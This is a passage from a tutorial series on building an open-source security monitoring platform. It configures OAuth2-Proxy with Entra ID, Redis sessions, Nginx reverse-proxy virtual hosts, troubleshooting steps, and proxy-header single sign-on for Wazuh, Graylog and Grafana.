accordingly.</li></ol><blockquote><strong><em>OAuth2 Proxy uses several layers to confirm a token’s validity</em></strong></blockquote><blockquote><em>Signature Verification:</em> The proxy checks that the token’s cryptographic signature was created by the trusted Identity Provider. It typically retrieves public keys automatically from the IdP JWKS (JSON Web Key Set) endpoint, which is discovered via the OpenID Connect well-known configuration URL.</blockquote><blockquote><em>Claim Validation</em>: Once the signature is verified, it inspects specific fields (claims) within the token:</blockquote><blockquote><em>iss (Issuer): </em>Must match the configured provider URL.</blockquote><blockquote><em>aud (Audience)</em>: Must contain the <em>client_id</em> of the OAuth2 Proxy instance to ensure the token was intended for this specific application.</blockquote><blockquote><em>exp (Expiration)</em>: Ensures the token has not expired.</blockquote><p>The result: a single sign-on for the entire platform, with persistent sessions stored in Redis.</p><h3>Installation</h3><pre>wget https://github.com/oauth2-proxy/oauth2-proxy/releases/download/v7.15.2/oauth2-proxy-v7.15.2.linux-amd64.tar.gz<br>tar -xzvf oauth2-proxy-v7.15.2.linux-amd64.tar.gz<br>chown root:root oauth2-proxy-v7.15.2.linux-amd64/oauth2-proxy<br>mv oauth2-proxy-v7.15.2.linux-amd64/oauth2-proxy /usr/sbin/</pre><h3>Configuration</h3><pre># Create directory structure<br><br>mkdir -p /etc/oauth2-proxy /log/oauth2-proxy</pre><pre># Create service user<br><br>useradd -d /dev/null oauth2-proxy -s /usr/sbin/nologin</pre><pre># Create files<br><br>touch /etc/systemd/system/oauth2-proxy.service<br>touch /etc/oauth2-proxy/service.cfg</pre><pre># Assign permissions to the service user<br><br>chown oauth2-proxy:oauth2-proxy /log/oauth2-proxy</pre><pre># Generate the cookie secret (32 random characters)<br><br>cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 32 | head -n 1</pre><p><strong>Configuration file:</strong></p><blockquote>Case with IdP Microsoft Entra ID.</blockquote><blockquote>Enable debugs on errors.</blockquote><pre># /etc/oauth2-proxy/service.cfg<br><br>client_id = "&lt;app_id&gt;"<br>client_secret = "&lt;app_secret&gt;"<br>oidc_issuer_url = "https://login.microsoftonline.com/&lt;tenant_id&gt;/v2.0"<br>cookie_secret = "&lt;cookie_secret&gt;"<br>cookie_domains = "&lt;domain.com&gt;"<br>email_domains = "&lt;domain.com&gt;"<br>whitelist_domains = "*.&lt;domain.com&gt;"<br>cookie_expire = "24h"<br>cookie_httponly = true<br>cookie_refresh = "50m"<br>cookie_secure = true<br>logging_filename = "/log/oauth2-proxy/oauth2.log"<br>logging_max_size = 100<br>logging_max_age = 5<br>provider = "oidc"<br>provider_display_name = "OIDC"<br>redis_connection_url = "redis://127.0.0.1:6379"<br>scope = "openid offline_access"<br>session_store_type = "redis"<br>set_xauthrequest = true<br>silence_ping_logging = true<br>skip_provider_button = true<br>upstreams = [ "file:///dev/null" ]<br>#show_debug_on_error = true</pre><blockquote>More details: <a href="https://oauth2-proxy.github.io/oauth2-proxy/configuration/overview"><em>https://oauth2-proxy.github.io/oauth2-proxy/configuration/overview</em></a></blockquote><p><strong>Registering in Microsoft Entra ID</strong></p><blockquote><em>⚠</em><strong><em> Important</em></strong><em>: </em>The Authorization Code Flow is the primary method to authenticate users, an industry-standard. Both tokens — Access and ID — are not enabled for implicit or hybrid flows.</blockquote><blockquote>The variety of flows often leads to confusion. With Auth Code Flow and <em>openid</em> scope, we will always obtain an Identification Token👍</blockquote><p>For OAuth2-Proxy to work, you need to register an application in the Azure portal:</p><ol><li><strong>Azure Portal</strong> → Entra ID → App registrations → New registration</li><li>Application name, account type, and redirect URI: <a href="https://domain.com/oauth2/callback">https://system.&lt;domain.com&gt;/oauth2/callback</a></li><li>Obtain the <strong>Application Client ID</strong> and <strong>Tenant ID</strong>.</li><li>Create a <strong>Client Secret</strong> under “Certificates &amp; Secrets”</li><li>In “API permissions”, add openid and offline_access</li></ol><p>These values are used in client_id, client_secret, and oidc_issuer_url in the configuration file.</p><p><strong>Create service</strong></p><pre># /etc/systemd/system/oauth2-proxy.service<br><br>[Unit]<br>Description=OAuth2 Proxy Daemon<br>After=network.target<br>[Service]<br>User=oauth2-proxy<br>Group=oauth2-proxy<br>Type=simple<br>ExecStart=/usr/sbin/oauth2-proxy --config=/etc/oauth2-proxy/service.cfg<br>Restart=always<br>RestartSec=10<br>ProtectSystem=full<br>NoNewPrivileges=true<br>[Install]<br>WantedBy=multi-user.target</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/700/0*XMImQw4ixJ6WN3lV.png"></figure><h3>Redis: Session Persistence and Storage</h3><p><strong><em>Part 8</em></strong></p><p>Redis solves a real problem: OAuth2-Proxy session cookies can grow large (cookie bloat) and exceed size limits. Storing sessions in Redis instead of in the cookie keeps the size controlled and allows sessions to survive proxy restarts.</p><h3>Installation</h3><pre>apt install redis-server -y</pre><h3>Configuration</h3><pre># Create directory structure<br><br>mkdir -p /data/redis/lib /log/redis</pre><pre># Assign permissions to the service user<br><br>chown redis:redis /data/redis/lib /log/redis</pre><pre># Bind mount<br><br>echo "/data/redis/lib /var/lib/redis none defaults,bind,nofail 0 0" &gt;&gt; /etc/fstab<br>echo "/log/redis /var/log/redis none defaults,bind,nofail 0 0" &gt;&gt; /etc/fstab<br>systemctl daemon-reload<br>mount -a</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/700/0*469jrtAPhs6EMetM.png"></figure><h3>Nginx: Reverse Proxy with TLS and Header-Based Authentication</h3><p><strong><em>Part 9</em></strong></p><p>Nginx is the entry point to the entire platform. It acts as a reverse proxy with TLS, routes traffic to Wazuh, Graylog, MCP, and Grafana, and coordinates with OAuth2-Proxy (except with MCP) to validate user identity on every request.</p><h3>Installation</h3><pre>apt install nginx -y</pre><h3>Configuration</h3><pre># Create directory structure<br><br>mkdir -p /log/nginx /etc/nginx/TLS</pre><pre># Create files<br><br>touch /etc/nginx/sites-available/{wazuh,graylog,graylog-mcp,grafana}<br>touch /etc/nginx/snippets/{security-headers.conf,oauth2-proxy.conf}<br>touch /etc/nginx/TLS/{certificate.crt,private.key}</pre><pre># Delete default host<br><br>rm /etc/nginx/sites-enabled/default</pre><pre># Bind mount<br><br>echo "/log/nginx /var/log/nginx none defaults,bind,nofail 0 0" &gt;&gt; /etc/fstab<br>systemctl daemon-reload<br>mount -a</pre><p><strong>Main configuration: nginx.conf</strong></p><p>The <strong>most notable </strong>aspect of this configuration is the map block: it extracts the username from the email returned by OIDC, taking everything before the @. This allows receive the username instead of the full email address.</p><blockquote>To avoid excessive logging, the access log is set to off.</blockquote><pre># /etc/nginx/nginx.conf<br><br>user www-data;<br>worker_processes auto;<br>worker_cpu_affinity auto;<br>pid /run/nginx.pid;<br>include /etc/nginx/modules-enabled/*.conf;<br>                                     <br>events {<br><br>  worker_connections 1024;<br><br>}<br><br>http {<br><br>  map $upstream_http_x_auth_request_email $http_x_auth_user {<br>    "~^(?&lt;user&gt;[^@]+)@" $user;<br>  }<br><br>  include mime.types;<br>  default_type application/octet-stream;<br>  sendfile on;<br>  tcp_nopush on;<br>  tcp_nodelay on;<br>  keepalive_timeout 65;<br>  keepalive_requests 1000;<br>  types_hash_max_size 2048;<br>  server_tokens off;<br>  gzip on;<br>  gzip_vary on;<br>  gzip_min_length 256;<br>  gzip_proxied any;<br>  gzip_comp_level 6;<br>  gzip_buffers 16 8k;<br>  gzip_http_version 1.1;<br>  gzip_types text/plain text/css application/json application/javascript text/xml application/xml application/xml+rss text/javascript;<br>  ssl_protocols TLSv1.2 TLSv1.3;<br>  ssl_prefer_server_ciphers on;<br>  ssl_ciphers 'EECDH+AESGCM:EDH+AESGCM:AES256+EECDH:AES256+EDH:!aNULL:!MD5:!3DES:!CBC:!SHA1';<br>  ssl_session_cache shared:SSL:10m;<br>  ssl_session_timeout 15m;<br>  access_log /var/log/nginx/access.log combined buffer=512k flush=1m;<br>  error_log /var/log/nginx/error.log;<br>  include /etc/nginx/conf.d/*.conf;<br>  include /etc/nginx/sites-enabled/*;<br><br>}</pre><p><strong>Security Headers snippet</strong></p><p>Best practices that strengthen your website’s security against common attacks.</p><pre># /etc/nginx/snippets/security-headers.conf<br><br>add_header Strict-Transport-Security "max-age=31536000; includeSubDomains";<br>add_header X-Frame-Options "SAMEORIGIN";<br>add_header X-XSS-Protection "1; mode=block";<br>add_header X-Content-Type-Options nosniff;<br>add_header X-Download-Options "noopen";<br>add_header Permissions-Policy 'geolocation=(), microphone=(), camera=()';<br>add_header Referrer-Policy 'no-referrer';<br>add_header Content-Security-Policy 'upgrade-insecure-requests';</pre><p><strong>OAuth2-Proxy snippet</strong></p><p>This snippet is included in every virtual host that requires authentication. It defines two locations: one for the OAuth2 flow and one internal for validating sessions.</p><pre># /etc/nginx/snippets/oauth2-proxy.conf<br><br>location /oauth2/ {<br>  proxy_pass http://localhost:4180;<br>  proxy_set_header Host $host;<br>  proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;<br>  proxy_set_header Content-Length "";<br>  proxy_pass_request_body off;<br>  access_log off;<br>}<br><br>location = /oauth2/auth {<br>  internal;<br>  proxy_pass http://localhost:4180;<br>  proxy_set_header Host $host;<br>  proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;<br>  proxy_set_header Content-Length "";<br>  proxy_pass_request_body off;<br>}</pre><blockquote>The <em>Content-Length: ""</em> headers and <em>proxy_pass_request_body off</em> are critical. Without them, authentication requests to internal APIs fail. This configuration has been validated in production.</blockquote><p><strong>Virtual hosts: one per application</strong></p><p>Each application has its own configuration file. The pattern is consistent:</p><ul><li>Redirect HTTP to HTTPS (301).</li><li>TLS with Wildcard certificate.</li><li>Include security headers and OAuth2-Proxy snippet.</li><li>Proxy pass to each application’s local port.</li></ul><p><strong>Wazuh Host</strong></p><blockquote><em>⚠</em><strong><em> </em></strong>Firstly, proxy authentication in Wazuh does not require creating internal users.</blockquote><blockquote><em>⚠ </em>This configuration is intended for administration; therefore, it has the <em>"admin"</em> backend role hardcoded.</blockquote><blockquote><em>proxy_set_header x-proxy-roles "admin"</em></blockquote><blockquote>You can associate Security Groups or Nginx mappings with custom backend roles. See the <strong><em>Custom Backend Role</em>s </strong>references later in the authentication section.</blockquote><pre># /etc/nginx/sites-available/wazuh<br><br>server {<br>  listen 80;<br>  server_name wazuh.&lt;domain.com&gt;;<br>  access_log off;<br>  log_not_found off;<br>  return 301 https://wazuh.&lt;domain.com&gt;$request_uri;<br>}<br><br>server {<br>  listen 443 ssl;<br>  server_name wazuh.&lt;domain.com&gt;;<br>  ssl_certificate /etc/nginx/TLS/certificate.crt;<br>  ssl_certificate_key /etc/nginx/TLS/private.key;<br>  include /etc/nginx/snippets/security-headers.conf;<br>  include /etc/nginx/snippets/oauth2-proxy.conf;<br>  location / {<br>   #auth_request /oauth2/auth;<br>   error_page 401 = /oauth2/start;<br>   auth_request_set $user $http_x_auth_user;<br>   proxy_set_header x-proxy-user $user;<br>   proxy_set_header x-proxy-roles "admin";<br>   proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;<br>   proxy_set_header X-Real-IP $remote_addr;<br>   proxy_http_version 1.1;<br>   proxy_read_timeout 10s;<br>   proxy_set_header Upgrade $http_upgrade;<br>   proxy_set_header Connection 'upgrade';<br>   proxy_set_header Host $host;<br>   proxy_cache_bypass $http_upgrade;<br>   proxy_set_header X-Forwarded-Proto $scheme;<br>   proxy_pass https://localhost:8080;<br>   access_log off;<br>   log_not_found off;<br>  }<br>}</pre><p><strong>Graylog Host</strong></p><pre># /etc/nginx/sites-available/graylog<br><br>server {<br>  listen 80;<br>  server_name graylog.&lt;domain.com&gt;;<br>  access_log off;<br>  log_not_found off;<br>  return 301 https://graylog.&lt;domain.com&gt;$request_uri;<br>}<br><br>server {<br>  listen 443 ssl;<br>  server_name graylog.&lt;domain.com&gt;;<br>  ssl_certificate /etc/nginx/TLS/certificate.crt;<br>  ssl_certificate_key /etc/nginx/TLS/private.key;<br>  include /etc/nginx/snippets/security-headers.conf;<br>  include /etc/nginx/snippets/oauth2-proxy.conf;<br>  location / {<br>   #auth_request /oauth2/auth;<br>   error_page 401 = /oauth2/start;<br>   auth_request_set $user $http_x_auth_user;<br>   proxy_set_header x-proxy-user $user;<br>   proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;<br>   proxy_set_header X-Real-IP $remote_addr;<br>   proxy_http_version 1.1;<br>   proxy_read_timeout 10s;<br>   proxy_set_header Upgrade $http_upgrade;<br>   proxy_set_header Connection 'upgrade';<br>   proxy_set_header Host $host;<br>   proxy_cache_bypass $http_upgrade;<br>   proxy_set_header X-Forwarded-Proto $scheme;<br>   proxy_pass http://localhost:9000;<br>   proxy_set_header X-Graylog-Server-URL https://$server_name;<br>   access_log off;<br>   log_not_found off;<br>  }<br>}</pre><p><strong>Graylog MCP Host</strong></p><pre># /etc/nginx/sites-available/graylog-mcp<br><br>server {<br>  listen 443 ssl;<br>  server_name graylog-mcp.&lt;domain.com&gt;;<br>  ssl_certificate /etc/nginx/TLS/certificate.crt;<br>  ssl_certificate_key /etc/nginx/TLS/private.key;<br>  include /etc/nginx/snippets/security-headers.conf;<br>  location  / {<br>   proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;<br>   proxy_set_header X-Real-IP $remote_addr;<br>   proxy_http_version 1.1;<br>   proxy_read_timeout 10s;<br>   proxy_set_header Upgrade $http_upgrade;<br>   proxy_set_header Connection 'upgrade';<br>   proxy_set_header Host $host;<br>   proxy_cache_bypass $http_upgrade;<br>   proxy_set_header X-Forwarded-Proto $scheme;<br>   proxy_pass http://localhost:9000/api/;<br>   access_log off;<br>   log_not_found off;<br>  }<br>}</pre><p><strong>Grafana Host</strong></p><pre># /etc/nginx/sites-available/grafana<br><br>server {<br>  listen 80;<br>  server_name grafana.&lt;domain.com&gt;;<br>  access_log off;<br>  log_not_found off;<br>  return 301 https://grafana.&lt;domain.com&gt;$request_uri;<br> }<br><br>server {<br>  listen 443 ssl;<br>  server_name grafana.&lt;domain.com&gt;;<br>  ssl_certificate         /etc/nginx/TLS/certificate.crt;<br>  ssl_certificate_key     /etc/nginx/TLS/private.key;<br>  include /etc/nginx/snippets/security-headers.conf;<br>  include /etc/nginx/snippets/oauth2-proxy.conf;<br>  location  / {<br>   #auth_request /oauth2/auth;<br>   error_page 401 = /oauth2/start;<br>   auth_request_set $user $http_x_auth_user;<br>   proxy_set_header x-proxy-user $user;<br>   proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;<br>   proxy_set_header X-Real-IP $remote_addr;<br>   proxy_http_version 1.1;<br>   proxy_read_timeout 10s;<br>   proxy_set_header Upgrade $http_upgrade;<br>   proxy_set_header Connection 'upgrade';<br>   proxy_set_header Host $host;<br>   proxy_cache_bypass $http_upgrade;<br>   proxy_set_header X-Forwarded-Proto $scheme;<br>   proxy_pass http://localhost:3000;<br>   access_log off;<br>   log_not_found off;<br>  }<br>}</pre><p>The auth_request is intentionally commented during initial configuration — it's enabled in the Authentication article, once all roles and users are configured in each application.</p><p><strong>graylog-mcp</strong>: a special virtual host without OAuth2 so Claude can access the Graylog MCP Bridge directly with Basic authentication. Covered in the Graylog MCP article.</p><pre># Create links<br><br>cd /etc/nginx/sites-enabled<br>ln -s ../sites-available/wazuh<br>ln -s ../sites-available/graylog<br>ln -s ../sites-available/graylog-mcp<br>ln -s ../sites-available/grafana</pre><p><strong>Configure certificates</strong></p><p><strong>/etc/nginx/TLS/certificate.crt</strong> — Site and intermediate certificates.<br><strong>/etc/nginx/TLS/private.key</strong> — Private key.</p><p><strong>TLS and verification</strong></p><pre># Certificate with restrictive permissions<br><br>chmod 400 /etc/nginx/TLS/*</pre><pre># Verify configuration before starting<br><br>nginx -t</pre><p>Expected response:</p><pre>nginx: the configuration file /etc/nginx/nginx.conf syntax is ok<br>nginx: configuration file /etc/nginx/nginx.conf test is successful</pre><pre># Restart<br><br>systemctl restart nginx</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/700/0*BLX_WJBjJLfvTMg2.png"></figure><h3>Troubleshooting Guide</h3><h3>Log Paths and Common Issues in a Complex Security Stack</h3><p><strong><em>Part 10</em></strong></p><p>When something fails in a stack of this complexity — and something always does — knowing exactly where to look for information is the difference between resolving the problem in five minutes or an hour. This article documents the log paths for all components and the most common problems encountered during implementation.</p><p><strong>Real-time log monitoring</strong></p><p>To monitor any service in real time.</p><pre># Filtered error warn<br>journalctl -u &lt;service&gt; | grep -i -E "error|warn"<br><br># Limit the number of the last events shown<br>journalctl -u &lt;service&gt; -n &lt;number&gt;<br><br># Show only the most recent journal entries, and continuously print new entries<br>journalctl -fu &lt;service&gt;<br><br># Jump to the end and augment log lines with explanation texts from the message catalog<br>journalctl -xeu &lt;service&gt;</pre><p>Where &lt;service&gt; can be any of the following:</p><ul><li>wazuh-dashboard</li><li>wazuh-indexer</li><li>wazuh-manager</li><li>graylog-server</li><li>mongod</li><li>grafana-server</li><li>oauth2-proxy</li><li>fluent-bit</li><li>nginx</li><li>redis-server</li></ul><p><strong>Log file paths<br></strong>For direct access to log files:</p><pre>tail -f &lt;path&gt;</pre><ul><li>Wazuh-Indexer /log/wazuh-indexer/wazuh-cluster.log</li><li>Graylog /log/graylog/server.log</li><li>MongoDB /log/mongodb/mongod.log</li><li>Grafana /log/grafana/grafana.log</li><li>Fluent Bit /log/fluent-bit/td-agent-bit.log</li><li>OAuth2-Proxy /log/oauth2-proxy/oauth2.log</li><li>Nginx /log/nginx/error.log</li><li>Redis /log/redis/redis-server.log</li></ul><p><strong>Known issue: unexpected server restart</strong></p><p><strong>Symptom:</strong> Wazuh Manager fails to start after an unexpected server restart. The log shows:</p><pre>ERROR: Another instance is locking this process. If you are sure that<br>no other instance is running, please remove<br>/var/ossec/var/start-script-lock/</pre><p><strong>Cause:</strong> Wazuh creates a lock directory when starting and removes it on clean shutdown. If the server restarts abruptly (power cut, OOM killer, etc.), the directory remains and the next startup fails.</p><p><strong>Solution:</strong> Remove the lock directory manually and start service.</p><pre>rm -rf /var/ossec/var/start-script-lock/<br>systemctl start wazuh-manager</pre><p><strong>Recommended diagnostic approach</strong></p><p>When something isn’t working, the recommended review order is:</p><ol><li><strong>Is the service running?</strong> systemctl status &lt;service&gt;</li><li><strong>Any recent errors?</strong> journalctl -xeu &lt;service&gt; --since "10 minutes ago"</li><li><strong>Does the service’s own log file have more detail?</strong> tail -50 &lt;log_path&gt;</li><li><strong>For network issues between components:</strong> verify ports are listening<br>ss -tlnp | grep &lt;port&gt;</li><li><strong>For authentication issues:</strong> check the OAuth2-Proxy log and the headers Nginx is sending.</li></ol><p>The most frequent problems in this implementation were:</p><ul><li>Incorrect indentation in fluent-bit.conf (service starts without errors but doesn't process data).</li><li>Wazuh TLS certificate not included in Graylog’s JKS (connection silently rejected).</li><li>Service startup order: MongoDB must be running before Graylog.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/700/0*Fx4TRiVvV9Z3fiR3.png"></figure><h3>Authentication: SSO and Integration Graylog with Wazuh</h3><p><strong><em>Part 11</em></strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*wl3X9Hdfe8RZMX7lY0agwQ.jpeg"></figure><p>This is the most complex article in the series. Up to this point, all components are installed, but each has its own authentication system. The goal of this article is to configure the three solutions to accept the user identity propagated by OAuth2-Proxy via Nginx — completely eliminating local passwords from the daily login cycle.</p><blockquote><em>⚠</em><strong><em> Important</em></strong><em>:</em> Follow the order A-&gt;B-&gt;C-&gt;D. Configuring proxy authentication on a system before the user has been created will result in loss of access.</blockquote><blockquote>Verify the response of each curl command before proceeding.</blockquote><pre># Create random passwords for users<br><br>cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 16 | head -n 1</pre><p><strong>How Proxy Authentication Works</strong></p><p>The mechanism is as follows: Nginx validates the user’s identity with OAuth2-Proxy and then injects the username as an HTTP header x-proxy-user in each request to applications. Each application must be configured to trust this header and automatically assign roles.</p><p><strong>Continue with the following four steps:</strong></p><h4>11-A. Wazuh OAuth2</h4><pre># Reload systemctl and start services<br><br>systemctl daemon-reload<br>systemctl start oauth2-proxy wazuh-manager wazuh-indexer wazuh-dashboard</pre><blockquote>Startups may take some time. Check the logs for errors before continuing.</blockquote><p><strong>Creating Role Mapping</strong></p><p>Wazuh needs a role mapping that associates the username propagated by the proxy with the administrator role.</p><p><strong>Option A — Web<br></strong>https://wazuh.&lt;domain.com&gt;/app/security#/security?tab=roleMapping</p><blockquote>Use the “admin” credential from the “wazuh-passwords.txt” file.</blockquote><ul><li>Role mapping name: ProxyAuth</li><li>Roles: administrator</li><li>Custom rules → “Add new rule”</li><li>User field: user_name</li><li>Search operation: MATCH</li><li>Value: &lt;AD_user&gt;</li></ul><p><strong>Option B — API</strong></p><blockquote>Use the “wazuh-wui” credential from the “wazuh-passwords.txt” file.</blockquote><pre># Generate token<br><br>token=$(curl -u wazuh-wui:&lt;password&gt; -k -X POST "https://localhost:55000/security/user/authenticate?raw=true")</pre><pre># Create rule<br><br>curl -k -X POST "https://localhost:55000/security/rules" \<br>-H "Authorization: Bearer $token" \<br>-H "Content-Type: application/json" \<br>-d '{<br>  "name": "ProxyAuth",<br>  "rule": {<br>    "MATCH": {<br>      "user_name": "&lt;AD_user&gt;"<br>    }<br>  }<br>}'</pre><blockquote>Rule created with ID: 100</blockquote><pre># Assign the rule to the administrator role<br><br>curl -k -X POST "https://localhost:55000/security/roles/1/rules?rule_ids=&lt;id_rule&gt;" \<br>-H "Authorization: Bearer $token" \<br>-H "Content-Type: application/json"</pre><p>— — — end options</p><p><strong>Configure proxy authentication in OpenSearch</strong></p><pre># /etc/wazuh-dashboard/opensearch_dashboards.yml - Add and replace (part of the file)<br><br>opensearch_security.auth.type: "proxy"<br>opensearch_security.proxycache.user_header: "x-proxy-user"<br>opensearch_security.proxycache.roles_header: "x-proxy-roles"<br>opensearch_security.proxycache.proxy_header: "x-forwarded-for"<br>opensearch_security.proxycache.proxy_header_ip: "127.0.0.1"<br>opensearch.requestHeadersAllowlist: ["securitytenant","Authorization","x-proxy-user","x-proxy-roles","x-forwarded-for"]</pre><pre># /etc/wazuh-indexer/opensearch-security/config.yml — Enable xff and proxy auth (part of the file)<br><br>xff:<br>  enabled: true<br>  internalProxies: '127\.0\.0\.1'<br><br>proxy_auth_domain:<br>  description: "Authenticate via proxy"<br>  http_enabled: true</pre><pre># /etc/nginx/sites-enabled/wazuh - Enable<br><br>auth_request /oauth2/auth;</pre><pre># Apply changes<br><br>cd /etc/wazuh-indexer/opensearch-security/<br>/usr/share/wazuh-indexer/plugins/opensearch-security/tools/securityadmin.sh \<br>  -cacert /etc/wazuh-indexer/certs/root-ca.pem \<br>  -cert /etc/wazuh-indexer/certs/admin.pem \<br>  -key /etc/wazuh-indexer/certs/admin-key.pem \<br>  -h 127.0.0.1<br>systemctl restart wazuh-dashboard nginx</pre><blockquote>As of now, Wazuh uses OAuth2-Proxy for authentication.</blockquote><p><strong>Custom Backend Roles</strong></p><p>If your goal is to replace the backend role hardcoded with a Group 365:</p><ul><li>In the App Entra ID, add Security Group ID in Token optional Group Claims (Token configuration).</li><li>Next, obtain the Object ID of group 365.</li><li>Duplicate the “all_access” role at: https://wazuh.&lt;domain.com&gt;/app/security-dashboards-plugin#/roles/duplicate/all_access and name it "Group365" for reference.</li><li>Then, go to the mapping page: https://wazuh.&lt;domain.com&gt;/app/security-dashboards-plugin#/roles/edit/Group365/mapuser and paste the Object ID into the Backend roles field.</li><li>In /etc/wazuh-indexer/opensearch.yml, add "Group365" to the list defined under plugins.security.restapi.roles_enabled.</li><li>In Nginx Wazuh Host set auth_request_set $roles $upstream_http_x_auth_request_groups and proxy_set_header x-proxy-roles $roles.</li><li>Restart wazuh-indexer and nginx systemctl restart wazuh-indexer nginx</li></ul><p><strong>References</strong></p><pre># /etc/nginx/sites-enabled/wazuh</pre><pre>location / {<br>   auth_request /oauth2/auth;<br>   error_page 401 = /oauth2/start;<br>   auth_request_set $user $http_x_auth_user;<br>   proxy_set_header x-proxy-user $user;<br>   <strong>auth_request_set $roles $upstream_http_x_auth_request_groups</strong>;<br>   <strong>proxy_set_header x-proxy-roles $roles</strong>;<br>   proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;<br>   proxy_set_header X-Real-IP $remote_addr;<br>   proxy_http_version 1.1;<br>   proxy_read_timeout 10s;<br>   proxy_set_header Upgrade $http_upgrade;<br>   proxy_set_header Connection 'upgrade';<br>   proxy_set_header Host $host;<br>   proxy_cache_bypass $http_upgrade;<br>   proxy_set_header X-Forwarded-Proto $scheme;<br>   proxy_pass <a href="https://localhost/">https://localhost:8080;</a><br>   access_log off;<br>   log_not_found off;<br>  }</pre><pre># /etc/wazuh-indexer/opensearch.yml</pre><pre>plugins.security.restapi.roles_enabled:<br>- "all_access"<br>- "security_rest_api_access"<br>- "<strong>Group365</strong>"</pre><p><strong>Alernative Map Nginx</strong></p><pre># /etc/nginx/nginx.conf</pre><pre>http {<br>  map $upstream_http_x_auth_request_email $http_x_auth_user {<br>    "~^(?&lt;user&gt;[^@]+)@" $user;<br>  }</pre><pre><strong>map $http_x_auth_user $roles {<br>    "&lt;AD_user1&gt;" "&lt;group_object_id&gt;";<br>    "&lt;AD_user2&gt;" "readall";<br>  }</strong></pre><h4>11-B. Connect Graylog to Wazuh Indexer</h4><p><strong>Create user in Wazuh for Graylog</strong></p><blockquote>Graylog needs a user in Wazuh Indexer to be able to index logs.</blockquote><blockquote>Use the “admin” credential from the “wazuh-passwords.txt” file.</blockquote><blockquote>User defined “graylog” (or you can choose another name).</blockquote><p><strong>Option A — Web<br></strong>https://wazuh.&lt;domain.com&gt;/app/security-dashboards-plugin#/users</p><ul><li>Username: graylog</li><li>Password: &lt;password&gt;</li><li>Backend roles: admin</li></ul><p><strong>Option B — API</strong></p><pre># Create user<br><br>curl -k -X PUT "https://127.0.0.1:9200/_plugins/_security/api/internalusers/graylog" \<br>-H "Content-type: application/json" \<br>-u "admin:&lt;password&gt;" \<br>-d '{<br>  "password": "&lt;password&gt;",<br>  "backend_roles": ["admin"]<br>}'</pre><p>— — — end options</p><pre># /etc/graylog/server/server.conf - Enable ElasticSearch connection<br><br>elasticsearch_hosts = https://graylog:&lt;password&gt;@127.0.0.1:9200</pre><blockquote>Use “127.0.0.1” and not “localhost” — Wazuh’s TLS certificate requires the SAN (Subject Alternative Name) to match exactly.</blockquote><h4>11-C. Graylog OAuth2</h4><pre># Start services<br><br>systemctl start mongod graylog-server</pre><blockquote>Use the “admin” credential, <a href="https://infosecwriteups.com/open-source-security-platform-for-it-infrastructure-centralizing-threat-detection-logs-and-sso-c08d1b412f37#ce08">reference</a>.</blockquote><p><strong>Option A — Web</strong></p><p><strong>Enable header</strong><br>https://graylog.&lt;domain.com&gt;/system/authentication/authenticator/edit</p><ul><li>Enabled: ✓</li><li>Username header: x-proxy-user</li></ul><p><strong>Create user<br></strong>https://graylog.&lt;domain.com&gt;/system/users/new</p><ul><li>First Name: &lt;first_name&gt;</li><li>Last Name: &lt;last_name&gt;</li><li>Username: &lt;AD_user&gt;</li><li>E-Mail Address: &lt;email&gt;</li><li>Assign Roles: Admin</li><li>Password: &lt;password&gt;</li></ul><p><strong>Option B — API</strong></p><pre># Enable header<br><br>curl -X PUT "http://localhost:9000/api/system/authentication/http-header-auth-config" \<br>-H "Content-Type: application/json" \<br>-H "X-Requested-By: cli" \<br>-u "admin:&lt;password&gt;" \<br>-d '{<br>  "enabled": true,<br>  "username_header": "x-proxy-user"<br>}'</pre><pre># Create user<br><br>curl -X POST "http://localhost:9000/api/users" \<br>-H "Content-Type: application/json" \<br>-H "X-Requested-By: cli" \<br>-u "admin:&lt;password&gt;" \<br>-d '{<br>  "first_name": "&lt;first_name&gt;",<br>  "last_name": "&lt;last_name&gt;",<br>  "username": "&lt;AD_user&gt;",<br>  "email": "&lt;email&gt;",<br>  "password": "&lt;password&gt;",<br>  "roles": ["Admin"],<br>  "permissions": []<br>}'</pre><p>— — — end options</p><pre># /etc/graylog/server/server.conf -Enable and edit<br><br>trusted_proxies = 127.0.0.1/32</pre><pre># /etc/nginx/sites-enabled/graylog - Enable<br><br>auth_request /oauth2/auth;</pre><pre># Apply changes<br><br>systemctl restart graylog-server nginx</pre><h4>11-D. Grafana OAuth2</h4><pre># Start service<br><br>systemctl start grafana-server</pre><p><strong>Create user</strong></p><blockquote>Use the default “admin:admin” credential.</blockquote><p><strong>Option A — Web<br></strong>https://grafana.&lt;domain.com&gt;/admin/users/create</p><ul><li>Name: &lt;name&gt;</li><li>Email: &lt;email&gt;</li><li>Username: &lt;AD_user&gt;</li><li>Password: &lt;password&gt;</li></ul><p>Next screen:</p><ul><li>Enable "Grafana Admin” and change to "Admin" role.</li></ul><p><strong>Option B — API</strong></p><pre># Create user<br><br>curl -X POST "http://localhost:3000/api/admin/users" \<br>-H "Content-Type: application/json" \<br>-u "admin:&lt;password&gt;" \<br>-d ' {<br>  "name":"&lt;name&gt;",<br>  "email":"&lt;email&gt;",<br>  "login":"&lt;AD_user&gt;",<br>  "password":"&lt;password&gt;"<br>}'</pre><blockquote>Account created with ID: 2</blockquote><pre># Assign global admin<br><br>curl -X PUT "http://localhost:3000/api/admin/users/&lt;user_id&gt;/permissions" \<br>-H "Content-Type: application/json" \<br>-u "admin:&lt;password&gt;" \<br>-d '{<br>  "isGrafanaAdmin": true<br>}'</pre><pre># Assign organization administrator role<br><br>curl -X PATCH "http://localhost:3000/api/orgs/1/users/&lt;user_id&gt;" \<br>-H "Content-Type: application/json" \<br>-u "admin:&lt;password&gt;" \<br>-d '{<br>  "role":"Admin"<br>}'</pre><p>— — — end options</p><pre># /etc/grafana/grafana.ini - Enable and edit<br><br>[auth.proxy]<br>enabled = true<br>header_name = x-proxy-user<br>header_property = username<br>auto_sign_up = 